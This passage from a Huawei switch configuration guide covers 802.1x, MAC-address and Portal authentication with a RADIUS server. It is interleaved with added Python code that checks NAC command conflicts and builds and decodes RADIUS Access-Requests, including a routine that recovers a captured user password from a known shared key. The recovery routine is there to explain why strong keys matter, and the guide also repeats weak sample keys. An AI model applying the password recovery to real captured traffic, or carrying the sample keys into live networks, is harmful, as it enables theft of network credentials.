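    "mac-address learning disable": r"^mac-address learning disable\b",
    "port link-type dot1q-tunnel": r"^port link-type dot1q-tunnel\b",
    "port vlan-mapping": r"^port vlan-mapping\b",
    "port vlan-stacking": r"^port vlan-stacking\b",
    "port-security enable": r"^port-security enable\b",
    "mac-vlan enable": r"^mac-vlan enable\b",
    "ip-subnet-vlan enable": r"^ip-subnet-vlan enable\b",
}

# NAC is enabled on an interface by binding an authentication profile (unified
# mode, this section) or by 'authentication dot1x|mac-authen|portal' (common mode).
NAC_ENABLED = re.compile(r"^authentication(-profile\s+\S+|\s+(dot1x|mac-authen|portal)\b)")


def parse_interfaces(config_text):
    """Return {interface name: [command lines]} from a Huawei-style configuration dump.
    Views are separated by lines holding only '#'; indentation is ignored."""
    interfaces, current = {}, None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line == "return":
            continue
        if line == "#":
            current = None          # '#' closes the current view
            continue
        m = re.match(r"^interface\s+(\S+)$", line)
        if m:
            current = m.group(1)
            interfaces[current] = []
        elif current is not None:
            interfaces[current].append(line)
    return interfaces


def find_nac_conflicts(config_text):
    """Return sorted (interface, offending command) pairs for NAC-enabled interfaces."""
    conflicts = []
    for name, cmds in parse_interfaces(config_text).items():
        if not any(NAC_ENABLED.match(c) for c in cmds):
            continue
        for label, pattern in NAC_INCOMPATIBLE.items():
            if any(re.match(pattern, c) for c in cmds):
                conflicts.append((name, label))
    return sorted(conflicts)


# Constructed sample: GE1/0/1 as on this page; the mac-limit line on GE1/0/2 and
# the whole GE1/0/3 are hypothetical and exist only to exercise the check.
SAMPLE_CONFIG = """\
#
sysname Switch
#
authentication-profile name p1
 dot1x-access-profile d1
 authentication mode multi-authen max-user 100
 access-domain huawei.com force
#
interface GigabitEthernet1/0/1
 port link-type access
 port default vlan 10
 authentication-profile p1
#
interface GigabitEthernet1/0/2
 port link-type access
 port default vlan 20
 mac-limit maximum 50
#
interface GigabitEthernet1/0/3
 port link-type access
 port default vlan 10
 port-security enable
 mac-limit maximum 50
 authentication-profile p1
#
return
"""

if __name__ == "__main__":
    for iface, cmd in find_nac_conflicts(SAMPLE_CONFIG):
        print(f"{iface}: NAC enabled together with '{cmd}'")
```

Run it against the output of display current-configuration saved to a file before enabling NAC on an interface, or before adding one of the listed commands to an interface that already carries an authentication profile; GigabitEthernet1/0/2 in the sample is not reported because NAC is not enabled on it.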

Networking Requirements
As shown in Figure 10-32, terminals in a company's offices are connected to the company's
internal network through the Switch. Unauthorized access to the internal network can damage
the company's service system and cause leakage of key information. Therefore, the
administrator requires that the Switch should control users' network access rights to ensure
internal network security.

To meet the company's high security requirements, 802.1x authentication is configured and the
RADIUS server is used to authenticate user identities.

Figure 10-32 Networking diagram for configuring 802.1x authentication

[Figure: Employees in the office area connect through a LAN Switch to GE1/0/1 (VLAN 10, VLANIF10 192.168.1.10/24) of the Switch; GE1/0/2 (VLAN 20, VLANIF20 192.168.2.10/24) leads to the intranet and the RADIUS Server 192.168.2.30.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure network interconnections.
2. Configure AAA on the Switch to implement identity authentication on access users
through the RADIUS server. The configuration includes configuring a RADIUS server
template, an AAA scheme, and an authentication domain, and binding the RADIUS
server template and AAA scheme to the authentication domain.
3. Configure 802.1x authentication to control network access rights of the employees in the
offices. The configuration includes:
a. Configure an 802.1x access profile.
b. Configure an authentication profile.
c. Enable 802.1x authentication on an interface.
NOTE

l Before performing operations in this example, ensure that user access terminals and the server can
communicate.
l This example only provides the configuration of the Switch. The configurations of the LAN Switch
and server are not provided here.
l In this example, the LAN switch exists between the access switch Switch and users. To ensure that
users can pass 802.1x authentication, you must configure the EAP packet transparent transmission
function on the LAN switch.
l Method 1: The S5700 is used as an example of the LAN switch. Perform the following
operations:
1. Run the l2protocol-tunnel user-defined-protocol 802.1x protocol-mac 0180-c200-0003
group-mac 0100-0000-0002 command in the system view of the LAN switch to configure
the LAN switch to transparently transmit EAP packets.
2. Run the l2protocol-tunnel user-defined-protocol 802.1x enable command on the
interface connecting to users and the interface connecting to the access switch to enable
the Layer 2 protocol transparent transmission function.
l Method 2: This method is recommended when a large number of users exist or high network
performance is required.
1. Run the following commands in the system view:
l undo bpdu mac-address 0180-c200-0000 ffff-ffff-fff0
l bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
l bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
l bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
l bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8
2. (This step is mandatory when you switch from method 1 to method 2.) Run the undo
l2protocol-tunnel user-defined-protocol 802.1x enable command in the interface view to
delete the configuration of transparent transmission of 802.1x protocol packets.

Procedure
Step 1 Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# Configure GE1/0/1 connecting the Switch to users as an access interface and add the
interface to VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 192.168.1.10 24
[Switch-Vlanif10] quit

# Configure GE1/0/2 connecting the Switch to the RADIUS server as an access interface and
add the interface to VLAN 20.

[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 192.168.2.10 24
[Switch-Vlanif20] quit

Step 2 Configure AAA.


# Create and configure the RADIUS server template rd1.
[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create the AAA authentication scheme abc and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create the authentication domain huawei.com, and bind the AAA authentication scheme
abc and RADIUS server template rd1 to the domain.
[Switch-aaa] domain huawei.com
[Switch-aaa-domain-huawei.com] authentication-scheme abc
[Switch-aaa-domain-huawei.com] radius-server rd1
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit

# Check whether a user can pass RADIUS authentication. The test user test and password
Huawei2012 have been configured on the RADIUS server.
[Switch] test-aaa test Huawei2012 radius-template rd1
Info: Account test succeed.

Step 3 Configure 802.1x authentication.


# Set the NAC mode to unified.
[Switch] authentication unified-mode

NOTE

l By default, the unified mode is used.
l After changing the NAC mode from common to unified, save the configuration and restart the device to
make the configuration take effect.

# Configure the 802.1x access profile d1.


NOTE

By default, an 802.1x access profile uses the EAP authentication mode. Ensure that the RADIUS server
supports EAP; otherwise, the server cannot process 802.1x authentication request packets.
[Switch] dot1x-access-profile name d1
[Switch-dot1x-access-profile-d1] quit

# Configure the authentication profile p1, bind the 802.1x access profile d1 to the
authentication profile, specify the domain huawei.com as the forcible authentication domain
in the authentication profile, set the user access mode to multi-authen, and set the maximum
number of access users to 100.
[Switch] authentication-profile name p1
[Switch-authen-profile-p1] dot1x-access-profile d1
[Switch-authen-profile-p1] access-domain huawei.com force
[Switch-authen-profile-p1] authentication mode multi-authen max-user 100
[Switch-authen-profile-p1] quit

# Bind the authentication profile p1 to GE1/0/1 and enable 802.1x authentication on the
interface.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] authentication-profile p1
[Switch-GigabitEthernet1/0/1] quit

Step 4 Verify the configuration.


1. A user starts the 802.1x client on a terminal, and enters the user name and password for
authentication.
2. If the user name and password are correct, an authentication success message is
displayed on the client page. The user can access the network.
3. After users go online, you can run the display access-user access-type dot1x command
on the device to view information about online 802.1x authentication users.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
authentication-profile name p1
dot1x-access-profile d1
authentication mode multi-authen max-user 100
access-domain huawei.com force
#
radius-server template rd1
radius-server shared-key cipher %#%#4*SO-2u,Q.\1C~%[eiB77N/^2wME;6t%6U@qAJ9:%#%#
radius-server authentication 192.168.2.30 1812 weight 80
#
dot1x-access-profile name d1
#
aaa
authentication-scheme abc
authentication-mode radius
domain huawei.com
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
authentication-profile p1
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface Vlanif10
ip address 192.168.1.10 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.10 255.255.255.0
#
return

Related Content
Videos

Configure 802.1x Authentication

10.4.2 Example for Configuring MAC Address Authentication to Control Internal User Access

MAC Address Authentication Overview


As one of the NAC authentication modes, MAC address authentication controls a user's network
access rights based on the user's interface and MAC address. The user does not need to install
any client software. MAC address authentication protects the security of enterprise intranets.

In MAC address authentication, client software does not need to be installed on user
terminals, but MAC addresses must be registered on servers, which makes management complex.
The other two NAC authentication methods have their own advantages and disadvantages: 802.1x
authentication provides high security, but it requires 802.1x client software to be installed
on user terminals, which makes network deployment less flexible. Portal authentication also
does not require client software and offers flexible deployment, but it provides lower security.

MAC address authentication is applied to access authentication of dumb terminals such as
printers and fax machines.

Configuration Notes
l This example applies to V200R007C20, V200R009 and later versions.

l NOTE
To know details about software mappings, see Switch Software Mapping Search.
l After enabling NAC on an interface, you cannot run the following commands on the
interface. Similarly, after running the following commands on an interface, you cannot
enable NAC on the interface.

Command                             Function
mac-limit                           Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable        Disables MAC address learning on an interface.
port link-type dot1q-tunnel         Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan     Configures VLAN mapping on an interface.
port vlan-mapping vlan inner-vlan
port vlan-stacking                  Configures selective QinQ.
port-security enable                Enables interface security.
mac-vlan enable                     Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable               Enables IP subnet-based VLAN assignment on an interface.

Networking Requirements
As shown in Figure 10-33, terminals in a company's physical access control department are
connected to the company's internal network through the Switch. Unauthorized access to the
internal network can damage the company's service system and cause leakage of key
information. Therefore, the administrator requires that the Switch should control users'
network access rights to ensure internal network security.

Because dumb terminals (such as printers) in the physical access control department cannot
have an authentication client installed, MAC address authentication needs to be configured
on the Switch. The terminals' MAC addresses are used as the user credentials and sent to the
RADIUS server for authentication, so no user name or password has to be entered when a
terminal connects to the network.

Figure 10-33 Networking diagram for configuring MAC address authentication

[Figure: Printers in the physical access control department connect through a LAN Switch to GE1/0/1 (VLAN 10, VLANIF10 192.168.1.10/24) of the Switch; GE1/0/2 (VLAN 20, VLANIF20 192.168.2.10/24) leads to the intranet and the RADIUS Server 192.168.2.30.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure network interconnections.
2. Configure AAA on the Switch to implement identity authentication on access users
through the RADIUS server. The configuration includes configuring a RADIUS server
template, an AAA scheme, and an authentication domain, and binding the RADIUS
server template and AAA scheme to the authentication domain.
3. Configure MAC address authentication so that the Switch can control network access
rights of the dumb terminals in the physical access control department. The configuration
includes:
a. Configure a MAC access profile.
b. Configure an authentication profile.
c. Enable MAC address authentication on an interface.
NOTE

l Before performing operations in this example, ensure that user access terminals and the server can
communicate.
l This example only provides the configuration of the Switch. The configurations of the LAN Switch
and server are not provided here.

Procedure
Step 1 Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.

# Create VLAN 10 and VLAN 20.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# Configure GE1/0/1 connecting the Switch to users as an access interface and add the
interface to VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 192.168.1.10 24
[Switch-Vlanif10] quit

# Configure GE1/0/2 connecting the Switch to the RADIUS server as an access interface and
add the interface to VLAN 20.
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 192.168.2.10 24
[Switch-Vlanif20] quit

Step 2 Configure AAA.

# Create and configure the RADIUS server template rd1.


[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create the AAA authentication scheme abc and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create the authentication domain huawei.com, and bind the AAA authentication scheme
abc and RADIUS server template rd1 to the domain.
[Switch-aaa] domain huawei.com
[Switch-aaa-domain-huawei.com] authentication-scheme abc
[Switch-aaa-domain-huawei.com] radius-server rd1
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit

# Check whether a user can pass RADIUS authentication. The test user test and password
Huawei2012 have been configured on the RADIUS server.
[Switch] test-aaa test Huawei2012 radius-template rd1
Info: Account test succeed.

Step 3 Configure MAC address authentication.


# Set the NAC mode to unified.
[Switch] authentication unified-mode

NOTE

l By default, the unified mode is used.
l After changing the NAC mode from common to unified, save the configuration and restart the device to
make the configuration take effect.

# Configure the MAC access profile m1.

NOTE

In a MAC access profile, a MAC address without hyphens (-) is used as the user name and password for
MAC address authentication. Ensure that the formats of the user name and password for MAC address
authentication configured on the RADIUS server are the same as those configured on the access device.
[Switch] mac-access-profile name m1
[Switch-mac-access-profile-m1] quit
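The exchange behind the test-aaa check in Step 2 and the MAC access profile note above, as an added example that is not Huawei code: it builds the RADIUS Access-Request (RFC 2865) the Switch would send to the RADIUS server at 192.168.2.30:1812 for "test-aaa test Huawei2012 radius-template rd1" with the page's shared key Huawei@2012, and the request a MAC access profile produces, in which the terminal's MAC address without hyphens is both the user name and the password. It also decodes the packet and recovers the password the way the server does, which shows why the shared key must be strong and identical on both sides. Assumptions: the NAS-IP-Address is the Switch's VLANIF20 address 192.168.2.10, the printer MAC address 00e0-fc12-3456 is constructed, lowercasing the MAC is this example's choice (the page states only that hyphens are removed), and the Request Authenticator is fixed only so the output is reproducible; a real NAS draws a fresh random one per request.

```python
"""RADIUS Access-Request construction and decoding per RFC 2865.

Added example, not Huawei code; see the lead-in for the assumptions.
"""
import hashlib
import os
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_NAS_IP_ADDRESS = 4
ATTR_CALLING_STATION_ID = 31

SHARED_KEY = b"Huawei@2012"             # radius-server shared-key on this page
NAS_IP = "192.168.2.10"                 # assumption: the Switch's VLANIF20 address
DEMO_AUTHENTICATOR = bytes(range(16))   # fixed for reproducible output only


def obfuscate_password(password, secret, authenticator):
    """RFC 2865 5.2: pad to 16-byte blocks; c_i = p_i XOR MD5(secret + c_(i-1)),
    with c_0 = Request Authenticator. The shared key is the only protection here."""
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        mask = hashlib.md5(secret + prev).digest()
        block = bytes(x ^ y for x, y in zip(padded[i:i + 16], mask))
        out += block
        prev = block
    return out


def reveal_password(cipher, secret, authenticator):
    """What the server does: invert obfuscate_password and drop the NUL padding."""
    out, prev = b"", authenticator
    for i in range(0, len(cipher), 16):
        mask = hashlib.md5(secret + prev).digest()
        block = cipher[i:i + 16]
        out += bytes(x ^ y for x, y in zip(block, mask))
        prev = block
    return out.rstrip(b"\x00")


def attribute(attr_type, value):
    """One RADIUS TLV: Type(1) Length(1, header included) Value."""
    if len(value) > 253:
        raise ValueError("attribute value too long")
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def build_access_request(identifier, username, password, secret, nas_ip,
                         calling_station=None, authenticator=None):
    """Return (packet, request_authenticator) for an Access-Request."""
    if authenticator is None:
        authenticator = os.urandom(16)
    attrs = attribute(ATTR_USER_NAME, username.encode())
    attrs += attribute(ATTR_USER_PASSWORD,
                       obfuscate_password(password.encode(), secret, authenticator))
    attrs += attribute(ATTR_NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split(".")))
    if calling_station is not None:      # the client MAC, carried by MAC authentication
        attrs += attribute(ATTR_CALLING_STATION_ID, calling_station.encode())
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs))
    return header + authenticator + attrs, authenticator


def parse_access_request(packet):
    """Decode the header and TLVs the way the server side does."""
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    if length != len(packet) or length < 20:
        raise ValueError("bad RADIUS length field")
    attrs, pos = {}, 20
    while pos < length:
        attr_type, attr_len = packet[pos], packet[pos + 1]
        if attr_len < 2 or pos + attr_len > length:
            raise ValueError("malformed attribute")
        attrs[attr_type] = packet[pos + 2:pos + attr_len]
        pos += attr_len
    return {"code": code, "id": identifier, "authenticator": packet[4:20], "attrs": attrs}


def mac_authen_credentials(mac):
    """MAC access profile default on this page: the MAC address without hyphens is
    both user name and password. Lowercasing is this example's choice; the RADIUS
    server must hold the accounts in the same format."""
    return mac.replace("-", "").replace(":", "").lower()


def demo():
    """The two requests this page's configuration would produce."""
    test_pkt, _ = build_access_request(1, "test", "Huawei2012", SHARED_KEY, NAS_IP,
                                       authenticator=DEMO_AUTHENTICATOR)
    cred = mac_authen_credentials("00e0-fc12-3456")   # constructed printer MAC
    mac_pkt, _ = build_access_request(2, cred, cred, SHARED_KEY, NAS_IP,
                                      calling_station="00e0-fc12-3456",
                                      authenticator=DEMO_AUTHENTICATOR)
    return test_pkt, mac_pkt


if __name__ == "__main__":
    for pkt in demo():
        print(pkt.hex())
```

The User-Password attribute is only XOR-masked with an MD5 stream keyed by the shared key, so anyone who captures the request on VLAN 20 and knows or guesses the key recovers the password; that is the reason to keep the RADIUS server on a dedicated VLAN, as this page does, and to use a long random shared key rather than a dictionary word.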

# Configure the authentication profile p1, bind the MAC access profile m1 to the
authentication profile, specify the domain huawei.com as the forcible authentication domain
in the authentication profile, set the user access mode to multi-authen, and set the maximum
number of access users to 100.
[Switch] authentication-profile name p1
[Switch-authen-profile-p1] mac-access-profile m1
[Switch-authen-profile-p1] access-domain huawei.com force
[Switch-authen-profile-p1] authentication mode multi-authen max-user 100
[Switch-authen-profile-p1] quit

# Bind the authentication profile p1 to GE1/0/1 and enable MAC address authentication on
the interface.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] authentication-profile p1
[Switch-GigabitEthernet1/0/1] quit

Step 4 Verify the configuration.


1. After a user starts a terminal, the device automatically obtains the user terminal's MAC
address as the user name and password for authentication.
2. Users can access the network after being authenticated successfully.
3. After users go online, you can run the display access-user access-type mac-authen
command on the device to view information about online MAC address authentication
users.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
authentication-profile name p1
mac-access-profile m1
authentication mode multi-authen max-user 100
access-domain huawei.com force
#
radius-server template rd1
radius-server shared-key cipher %#%#4*SO-2u,Q.\1C~%[eiB77N/^2wME;6t%6U@qAJ9:%#%#
radius-server authentication 192.168.2.30 1812 weight 80
#
mac-access-profile name m1
#
aaa
authentication-scheme abc
authentication-mode radius
domain huawei.com
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
authentication-profile p1
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface Vlanif10
ip address 192.168.1.10 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.10 255.255.255.0
#
return

10.4.3 Example for Configuring Portal Authentication to Control Internal User Access

Portal Authentication Overview


As one of the NAC authentication modes, Portal authentication is also called web authentication.
Portal authentication websites are generally called Portal websites. When users go online, they
must be authenticated on a Portal website and can use network resources only after they pass
the authentication.

Portal authentication cannot provide high security, but it does not require client software
installation and offers flexible deployment. The other two NAC authentication methods have
their own advantages and disadvantages: 802.1x authentication provides high security, but it
requires 802.1x client software to be installed on user terminals, which makes network
deployment less flexible. MAC address authentication does not require client software, but
MAC addresses must be registered on an authentication server, which makes management complex.

Portal authentication is applied to scenarios where a large number of scattered users such as
company visitors move frequently.

Configuration Notes
l This example applies to V200R007C20, V200R009 and later versions.
l NOTE
To know details about software mappings, see Switch Software Mapping Search.
l After enabling NAC on an interface, you cannot run the following commands on the
interface. Similarly, after running the following commands on an interface, you cannot
enable NAC on the interface.
Command                             Function
mac-limit                           Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable        Disables MAC address learning on an interface.
port link-type dot1q-tunnel         Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan     Configures VLAN mapping on an interface.
port vlan-mapping vlan inner-vlan
port vlan-stacking                  Configures selective QinQ.
port-security enable                Enables interface security.
mac-vlan enable                     Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable               Enables IP subnet-based VLAN assignment on an interface.

Networking Requirements
As shown in Figure 10-34, terminals in a company's visitor area are connected to the
company's internal network through the Switch. Unauthorized access to the internal network
can damage the company's service system and cause leakage of key information. Therefore,
the administrator requires that the Switch control users' network access rights to ensure
internal network security.
Because visitors move frequently, Portal authentication is configured and the RADIUS server
is used to authenticate user identities.


Figure 10-34 Networking diagram for configuring Portal authentication
[Figure: visitor terminals in the visitor area (VLAN 10, 192.168.1.0/24) connect through a LAN
Switch to GE1/0/1 of the Switch (VLANIF10, 192.168.1.10/24). GE1/0/2 of the Switch (VLANIF20,
192.168.2.10/24, VLAN 20) connects to the RADIUS Server/Portal Server at 192.168.2.30 and to
the intranet.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure network interconnections.


2. Configure AAA on the Switch to implement identity authentication on access users
through the RADIUS server. The configuration includes configuring a RADIUS server
template, an AAA scheme, and an authentication domain, and binding the RADIUS
server template and AAA scheme to the authentication domain.
3. Configure Portal authentication to control network access rights of the visitors in the
visitor area. The configuration includes:
a. Configure a Portal server template.
b. Configure a Portal access profile.
c. Configure an authentication profile.
d. Enable Portal authentication on an interface.
NOTE

l Before performing operations in this example, ensure that user access terminals and the server can
communicate.
l This example only provides the configuration of the Switch. The configurations of the LAN Switch and
server are not provided here.

Procedure
Step 1 Create VLANs and configure the VLANs allowed by interfaces so that packets can be
forwarded.

# Create VLAN 10 and VLAN 20.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# Configure GE1/0/1 connecting the Switch to users as an access interface and add the
interface to VLAN 10.


[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 192.168.1.10 24
[Switch-Vlanif10] quit

# Configure GE1/0/2 connecting the Switch to the RADIUS server as an access interface and
add the interface to VLAN 20.
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 192.168.2.10 24
[Switch-Vlanif20] quit

Step 2 Configure AAA.


# Create and configure the RADIUS server template rd1.
[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create the AAA authentication scheme abc and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create the authentication domain huawei.com, and bind the AAA authentication scheme
abc and RADIUS server template rd1 to the domain.
[Switch-aaa] domain huawei.com
[Switch-aaa-domain-huawei.com] authentication-scheme abc
[Switch-aaa-domain-huawei.com] radius-server rd1
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit

# Check whether a user can pass RADIUS authentication. The test user test and password
Huawei2012 have been configured on the RADIUS server.
[Switch] test-aaa test Huawei2012 radius-template rd1
Info: Account test succeed.

Step 3 Configure Portal authentication.


# Set the NAC mode to unified.
[Switch] authentication unified-mode

NOTE

l By default, the unified mode is used.


l After changing the NAC mode from common to unified, save the configuration and restart the device to
make the configuration take effect.

# Configure the Portal server template abc.


[Switch] web-auth-server abc
[Switch-web-auth-server-abc] server-ip 192.168.2.30
[Switch-web-auth-server-abc] port 50200
[Switch-web-auth-server-abc] url http://192.168.2.30:8080/portal
[Switch-web-auth-server-abc] shared-key cipher Huawei@123
[Switch-web-auth-server-abc] quit


NOTE

Ensure that the port number configured on the device is the same as the port number used by the Portal server.

# Configure the Portal access profile web1.


[Switch] portal-access-profile name web1
[Switch-portal-acces-profile-web1] web-auth-server abc direct
[Switch-portal-acces-profile-web1] quit

# Configure the authentication profile p1, bind the Portal access profile web1 to the
authentication profile, specify the domain huawei.com as the forcible authentication domain
in the authentication profile, set the user access mode to multi-authen, and set the maximum
number of access users to 100.
[Switch] authentication-profile name p1
[Switch-authen-profile-p1] portal-access-profile web1
[Switch-authen-profile-p1] access-domain huawei.com force
[Switch-authen-profile-p1] authentication mode multi-authen max-user 100
[Switch-authen-profile-p1] quit

NOTE

In this example, users use static IP addresses. If users obtain IP addresses using DHCP and the DHCP server
is on the upstream network of the Switch, configure an authentication-free rule to allow packets from the
network segment of the DHCP server to pass through. If the URL to the Portal server needs to be resolved by
the DNS server that is on the upstream network of the Switch, configure an authentication-free rule to allow
packets from the network segment of the DNS server to pass through.

# Bind the authentication profile p1 to GE1/0/1 and enable Portal authentication on the
interface.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] authentication-profile p1
[Switch-GigabitEthernet1/0/1] quit

Step 4 Verify the configuration.


1. After a user opens the browser and enters any website address, the user is redirected to
the Portal authentication page. The user then can enter the user name and password for
authentication.
2. If the user name and password are correct, an authentication success message is
displayed on the Portal authentication page. The user can access the network.
3. After users go online, you can run the display access-user access-type portal command
on the device to view information about online Portal authentication users.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
authentication-profile name p1
portal-access-profile web1
authentication mode multi-authen max-user 100
access-domain huawei.com force
#
radius-server template rd1
radius-server shared-key cipher %#%#4*SO-2u,Q.\1C~%[eiB77N/^2wME;6t%6U@qAJ9:%#%#

radius-server authentication 192.168.2.30 1812 weight 80


#
web-auth-server abc
 server-ip 192.168.2.30
 port 50200
 shared-key cipher %#%#CR@WPM9Q30%]A}9]g4hUqe1u~4Fz}PlU)QPL;73#%#%#
 url http://192.168.2.30:8080/portal
#
portal-access-profile name web1
 web-auth-server abc direct
#
aaa
authentication-scheme abc
authentication-mode radius
domain huawei.com
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
authentication-profile p1
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface Vlanif10
ip address 192.168.1.10 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.10 255.255.255.0
#
return

10.5 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication Server) (V200R007C00 and Earlier Versions, V200R008C00)


10.5.1 Example for Configuring Portal Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Core Switch)
Portal Authentication Overview
Portal authentication is a Network Admission Control (NAC) method. Portal authentication is
also called web authentication. Generally, Portal authentication websites are referred to as
Portal websites. Users must be authenticated by the Portal websites before they can use
network services.
Portal authentication provides lower security than 802.1x authentication, but allows flexible
networking because no client software is required on users' terminals. 802.1x authentication is
another NAC method. It is more secure than Portal authentication, but requires the installation of
client software on users' terminals, resulting in networking inflexibility. Like Portal
authentication, MAC address authentication does not require the installation of client software,
but user terminals' MAC addresses must be registered on the authentication server, which makes
network configuration and management complex.
Portal authentication applies to the users who are sparsely distributed and move frequently,
for example, guests of a company.

Configuration Notes
l This example applies to all S12700 versions.
  NOTE
  To know details about software mappings, see Version Mapping Search for Huawei Campus
  Switches.
l Huawei's Agile Controller in V100R001C00 functions as the Portal server and RADIUS
  server in this example. For the Agile Controller, the minimum version required is
  V100R001C00.
l The RADIUS authentication and accounting shared keys and Portal shared key on the
  switch must be the same as those on the Agile Controller server.
l By default, the switch allows the packets from RADIUS and Portal servers to pass. You
  do not need to configure authentication-free rules for the two servers on the switch.

Networking Requirements
An enterprise needs to deploy an identity authentication system to control employees' network
access rights and allow only authorized users to access the network.
The enterprise has the following requirements:
l The authentication operations should be simple. The authentication system only
performs access authorization. Minimum client software is installed on user terminals.
l To facilitate network reconstruction and reduce investments, the enterprise requires the
authentication point be deployed on the core switch.
l A unified identity authentication mechanism is used to authenticate all terminals
accessing the campus network and deny access from unauthorized terminals.
l R&D employees can connect only to public servers (such as the web and DNS servers)
of the enterprise before the authentication, and can connect to both the intranet (code
library and issue tracking system) and Internet after being authenticated.


l Marketing employees can connect only to public servers (such as the web and DNS
servers) of the enterprise before the authentication, and can connect only to the Internet
after being authenticated.

Figure 10-35 Portal authentication deployed at the core layer
[Figure: R&D Dept. PCs connect to GE0/0/1 of access switch SwitchA, and Marketing Dept. PCs
and laptops to GE0/0/1 of access switch SwitchB. SwitchA and SwitchB uplink through GE0/0/2 to
GE1/0/1 and GE1/0/2 of aggregation switch SwitchC, whose GE1/0/3 connects to GE1/0/1 of core
switch SwitchD. SwitchD is the authentication point; its GE1/0/2 connects to the server area.
Pre-authentication domain: Agile Controller (includes Portal and RADIUS servers), DNS server,
